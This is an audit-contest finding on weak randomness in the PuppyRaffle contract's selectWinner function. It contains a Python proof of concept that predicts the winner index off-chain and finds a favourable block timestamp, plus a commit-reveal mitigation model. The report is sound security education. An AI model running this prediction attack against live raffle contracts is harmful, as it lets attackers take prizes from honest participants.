Beginner Friendly, Foundry, NFT
100 EXP
Submission Details
Severity: high
Valid

Potential for Front-Running in `selectWinner`

Vulnerability Details

The selectWinner function is meant to pick a winner uniformly at random from the players. It is callable by anyone, and the "random" index it derives depends only on values the caller already knows or can influence, so the outcome can be computed before the transaction is sent and the call timed, or front-run, to land on a chosen entry. The winner is selected as follows:

function selectWinner() external {
    require(block.timestamp >= raffleStartTime + raffleDuration, "PuppyRaffle: Raffle not over");
    require(players.length >= 4, "PuppyRaffle: Need at least 4 players");
    // Random selection logic: every hash input is known before the transaction lands.
    // msg.sender is chosen by the caller; block.timestamp and block.difficulty are public
    // and, for the block producer, partly controllable.
    uint256 winnerIndex = uint256(keccak256(abi.encodePacked(msg.sender, block.timestamp, block.difficulty))) % players.length;
    ...
}

Impact

  • Manipulation of Results: winnerIndex is a deterministic function of msg.sender, block.timestamp and block.difficulty, so any caller can evaluate it off-chain for the upcoming block and submit selectWinner only when the result points at an index they hold (entering several addresses raises the number of favourable indices). Because msg.sender is part of the hash, an attacker who sees an honest selectWinner call in the mempool can front-run it with their own call whenever their own address yields a better index. A block producer has more leverage still: it chooses which selectWinner transaction is included, can adjust block.timestamp within the allowed drift, and pre-merge could grind block.difficulty (post-merge the same opcode returns prevrandao, which is likewise public before the block is built).

  • Loss of Fairness: If participants can influence the outcome of the raffle, it undermines the fairness and integrity of the game, leading to a loss of trust among users.

  • Economic Impact: The potential to manipulate results could lead to financial losses for honest participants and unjust gains for the attacker.
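The prediction described above, carried out off-chain, as an added example that is not part of the PuppyRaffle code base or the original submission. It re-implements the contract's index computation (Keccak-256 in pure Python, so nothing beyond the standard library is needed), then scans block timestamps for one at which the attacker's own entry wins. The player addresses, the raffle end time and the difficulty/prevrandao value are constructed sample values.

```python
# Added example, not part of the PuppyRaffle code base: re-derive selectWinner's
# winnerIndex off-chain for a given caller / timestamp / difficulty and scan for a
# timestamp at which the attacker's own entry wins. Keccak-256 is implemented in
# pure Python so the script runs without web3 or eth_hash installed.

MASK64 = (1 << 64) - 1

# Keccak-f[1600] round constants and rho rotation offsets (offset for lane x + 5*y)
RC = [
    0x0000000000000001, 0x0000000000008082, 0x800000000000808A, 0x8000000080008000,
    0x000000000000808B, 0x0000000080000001, 0x8000000080008081, 0x8000000000008009,
    0x000000000000008A, 0x0000000000000088, 0x0000000080008009, 0x000000008000000A,
    0x000000008000808B, 0x800000000000008B, 0x8000000000008089, 0x8000000000008003,
    0x8000000000008002, 0x8000000000000080, 0x000000000000800A, 0x800000008000000A,
    0x8000000080008081, 0x8000000000008080, 0x0000000080000001, 0x8000000080008008,
]
RHO = [0, 1, 62, 28, 27, 36, 44, 6, 55, 20, 3, 10, 43, 25, 39,
       41, 45, 15, 21, 8, 18, 2, 61, 56, 14]


def _rotl(v: int, n: int) -> int:
    return ((v << n) | (v >> (64 - n))) & MASK64 if n else v


def _keccak_f1600(lanes: list) -> list:
    for rnd in range(24):
        # theta
        c = [lanes[x] ^ lanes[x + 5] ^ lanes[x + 10] ^ lanes[x + 15] ^ lanes[x + 20]
             for x in range(5)]
        d = [c[(x - 1) % 5] ^ _rotl(c[(x + 1) % 5], 1) for x in range(5)]
        lanes = [lanes[i] ^ d[i % 5] for i in range(25)]
        # rho + pi
        b = [0] * 25
        for x in range(5):
            for y in range(5):
                b[y + 5 * ((2 * x + 3 * y) % 5)] = _rotl(lanes[x + 5 * y], RHO[x + 5 * y])
        # chi
        lanes = [b[i] ^ (~b[(i % 5 + 1) % 5 + 5 * (i // 5)] & b[(i % 5 + 2) % 5 + 5 * (i // 5)])
                 for i in range(25)]
        # iota
        lanes[0] ^= RC[rnd]
    return lanes


def keccak256(data: bytes) -> bytes:
    """Original Keccak-256 (0x01 padding) as used by Solidity's keccak256, not NIST SHA3-256."""
    rate = 136
    buf = bytearray(data) + b"\x01"
    buf += b"\x00" * (-len(buf) % rate)
    buf[-1] |= 0x80
    lanes = [0] * 25
    for off in range(0, len(buf), rate):
        for i in range(rate // 8):
            lanes[i] ^= int.from_bytes(buf[off + 8 * i:off + 8 * i + 8], "little")
        lanes = _keccak_f1600(lanes)
    return b"".join(lane.to_bytes(8, "little") for lane in lanes[:4])


def abi_encode_packed(addr: str, timestamp: int, difficulty: int) -> bytes:
    """abi.encodePacked(address, uint256, uint256): 20 + 32 + 32 bytes, no padding."""
    return bytes.fromhex(addr[2:]) + timestamp.to_bytes(32, "big") + difficulty.to_bytes(32, "big")


def predict_winner_index(caller: str, timestamp: int, difficulty: int, n_players: int) -> int:
    """Exactly the contract's computation; none of its inputs is secret from the caller."""
    digest = keccak256(abi_encode_packed(caller, timestamp, difficulty))
    return int.from_bytes(digest, "big") % n_players


def find_favourable_timestamp(caller, difficulty, n_players, target, start_ts, window=300):
    """Earliest block timestamp in [start_ts, start_ts + window) at which `target` wins.
    A plain caller simply waits for such a block; a block producer can set the timestamp."""
    for ts in range(start_ts, start_ts + window):
        if predict_winner_index(caller, ts, difficulty, n_players) == target:
            return ts
    return None


# Constructed sample raffle: four entries, the attacker holds index 3.
PLAYERS = ["0x" + f"{i:02x}" * 20 for i in (0x11, 0x22, 0x33, 0xAA)]
ATTACKER = PLAYERS[3]
RAFFLE_END_TS = 1_700_000_000   # assumed raffleStartTime + raffleDuration
PREVRANDAO = 0x5EED             # assumed block.difficulty / prevrandao value (public)


def demo() -> dict:
    n = len(PLAYERS)
    immediate = predict_winner_index(ATTACKER, RAFFLE_END_TS, PREVRANDAO, n)
    ts = find_favourable_timestamp(ATTACKER, PREVRANDAO, n, 3, RAFFLE_END_TS)
    at_ts = predict_winner_index(ATTACKER, ts, PREVRANDAO, n) if ts is not None else None
    return {"index_if_called_immediately": immediate,
            "favourable_timestamp": ts,
            "index_at_favourable_timestamp": at_ts}


if __name__ == "__main__":
    print(demo())
```

With four players each timestamp has a one-in-four chance of favouring the attacker, so a favourable block is normally found within seconds; the attacker simply delays the selectWinner call until then, or front-runs an honest caller whose address would produce a different index.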

Recommendations

  • Implement Commit-Reveal Scheme: have each participant commit a hash of a secret value during the entry or a dedicated commit window and reveal the preimage only after the raffle closes; the seed is then derived from all revealed secrets, so no single party knows it before everyone has committed. Participants who fail to reveal must be penalised (for example, their entry is forfeited), otherwise the last revealer can withhold their secret to re-roll an unfavourable result.

  • Time-Lock Mechanism: freeze the players array some time before winner selection and reject entries after that point, so the pool the index is drawn from is fixed before anyone can tune their selectWinner call around it.

  • Randomness Improvement: draw the winner from a verifiable external randomness source such as Chainlink VRF, which returns a random word together with an on-chain-verifiable proof. This turns selectWinner into a two-step request/fulfil flow in which the index is computed from the delivered word rather than from block and sender data.
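The commit-reveal recommendation above, modelled off-chain, as an added example that is not part of the PuppyRaffle code base or the original submission. SHA-256 stands in for the on-chain keccak256 (an assumption that does not change the protocol's logic), the player addresses and their secrets are constructed sample values, and the model shows the failure mode of an entry that commits but never reveals: it is dropped from the pool and recorded as forfeited rather than being allowed to block or re-roll the draw.

```python
# Added example, not from the PuppyRaffle code base: an off-chain model of the
# commit-reveal seed derivation recommended above. SHA-256 stands in for the
# on-chain keccak256 (an assumption that does not affect the protocol's logic).
import hashlib


class CommitRevealRaffle:
    """Phases: commit (players post H(addr || secret)), reveal (players disclose the
    secret, which is checked against the commitment), select (seed from all secrets).
    Entries that never reveal are dropped from the pool and recorded as forfeited, so
    withholding a reveal to re-roll the seed costs the withholder their own entry."""

    def __init__(self, players):
        self.players = list(players)   # fixed before the commit window opens (time-lock)
        self.commits = {}
        self.reveals = {}
        self.phase = "commit"

    @staticmethod
    def commitment(addr: str, secret: bytes) -> bytes:
        return hashlib.sha256(bytes.fromhex(addr[2:]) + secret).digest()

    def commit(self, addr: str, commitment: bytes) -> None:
        if self.phase != "commit":
            raise RuntimeError("commit window closed")
        if addr not in self.players or addr in self.commits:
            raise ValueError("not a player or already committed")
        self.commits[addr] = commitment

    def close_commits(self) -> None:
        self.phase = "reveal"

    def reveal(self, addr: str, secret: bytes) -> None:
        if self.phase != "reveal":
            raise RuntimeError("not in reveal phase")
        if self.commits.get(addr) != self.commitment(addr, secret):
            raise ValueError("reveal does not match commitment")
        self.reveals[addr] = secret

    def select_winner(self):
        """Returns (winner, forfeited). seed = H(secret_1 || ... || secret_n) over the
        revealed entries in fixed player order; nobody knew it before all commits were in."""
        self.phase = "done"
        eligible = [p for p in self.players if p in self.reveals]
        forfeited = [p for p in self.players if p in self.commits and p not in self.reveals]
        if not eligible:
            raise RuntimeError("nobody revealed; refund instead of selecting")
        seed = hashlib.sha256(b"".join(self.reveals[p] for p in eligible)).digest()
        return eligible[int.from_bytes(seed, "big") % len(eligible)], forfeited


# Constructed sample: four players with fixed, demo-only secrets (real ones must be random).
PLAYERS = ["0x" + f"{i:02x}" * 20 for i in (0x11, 0x22, 0x33, 0xAA)]
SECRETS = {p: hashlib.sha256(p.encode()).digest() for p in PLAYERS}


def run_raffle(withhold=()):
    """Full protocol run; players listed in `withhold` commit but never reveal."""
    raffle = CommitRevealRaffle(PLAYERS)
    for p in PLAYERS:
        raffle.commit(p, CommitRevealRaffle.commitment(p, SECRETS[p]))
    raffle.close_commits()
    for p in PLAYERS:
        if p not in withhold:
            raffle.reveal(p, SECRETS[p])
    return raffle.select_winner()


if __name__ == "__main__":
    print("everyone reveals:     ", run_raffle())
    print("last player withholds:", run_raffle(withhold=(PLAYERS[3],)))
```

Because the seed is only fixed once the last reveal lands, the one party who can still influence it is whoever reveals last; excluding non-revealers from the pool (and, on-chain, keeping their entry fee) is what removes the incentive to withhold.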

Updates

Lead Judging Commences

Hamiltonite Lead Judge about 2 years ago
Submission Judgement Published
Validated
Assigned finding tags:

weak-randomness

Root cause: bad RNG
Impact: manipulate winner

selectWinner can be front-run
